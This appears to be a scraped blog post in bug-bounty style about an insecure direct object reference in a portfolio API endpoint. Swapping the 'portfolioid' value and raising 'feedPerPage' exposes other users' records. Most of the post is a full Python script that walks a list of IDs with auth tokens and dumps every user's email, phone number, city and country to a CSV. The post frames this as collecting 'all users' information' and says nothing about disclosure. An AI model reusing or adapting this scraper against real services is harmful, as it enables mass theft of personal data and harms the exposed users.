.png)
1 week ago
18 BOOK THIS SPACE FOR AD
ARTICLE AD
Hello friends,
I will discuss how I can expose the information of all users, such as email addresses, phone numbers,city …etc.
let’s start.
After deep diving into the target, I found this endpoint.
api/v1/protfolio.php
I realized that my account information was exposed.
Try interacting with this endpoint after changing the value of ‘feedPerPage’ parameter I found that the number of emails increased to 5186.
When I tried to change the value of ‘portfolioid’ parameter , the displayed information changed to another user’s data. I realized that this behavior depended on the ‘portfolioid’ parameter, which was exposed in the endpoint response. With my limited knowledge of Python and using ChatGPT, I wrote this code.”.
The code takes an ‘ids.csv’ file that contains portfolio IDs and extracts information to a CSV file.”
import requestsimport csv
url = "https://example.com/api/v1/portfolio.php"
params = {
"ex": ".................................",
"xtoken": "...........................",
"list": "supporters",
"paginationType": "pointer",
"pointer": 0,
"feedPerPage": 10000,
"versionCode": 965,
"sortBy": ""
}
csv_file_path = 'all_user_profiles.csv'
with open(csv_file_path, 'w', newline='') as csvfile:
fieldnames = ['User ID', 'Username', 'First Name', 'Email', 'Mobile Number',
'Feed Count', 'Follower Count', 'City', 'Country', 'Photo URL', 'Portfolio URL']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
ids_csv_file_path = 'ids.csv'
with open(ids_csv_file_path, 'r') as id_file:
reader = csv.reader(id_file)
for row in reader:
if row:
portfolio_id = row[0]
params['portfolioId'] = portfolio_id
print(f'working on portfolioId {portfolio_id}')
response = requests.get(url, params=params)
if response.status_code == 200:
data = response.json()
if 'result' in data:
user_profiles = data['result']
for profile in user_profiles:
userid = profile.get('USERID', '')
username = profile.get('USERNAME', '')
firstname = profile.get('FIRSTNAME', '')
email = profile.get('EMAIL', '')
mobile_number = profile.get('MOBILE_NUMBER', '')
feed_count = profile.get('USER_FEED_COUNT', '')
follower_count = profile.get('USER_FOLLOWER_COUNT', '')
city = profile.get('CITY', '')
country = profile.get('COUNTRY', '')
photo_url = profile.get('PHOTO', '')
portfolio_url = profile.get('PORTFOLIO_URL', '')
writer.writerow({
'User ID': userid,
'Username': username,
'First Name': firstname,
'Email': email,
'Mobile Number': mobile_number,
'Feed Count': feed_count,
'Follower Count': follower_count,
'City': city,
'Country': country,
'Photo URL': photo_url,
'Portfolio URL': portfolio_url
})
else:
print("")
else:
print("")
“Make a cup of tea, and come back later to retrieve all users’ information.”
Thanks for reading
Bengali (Bangladesh) · 
English (United States) ·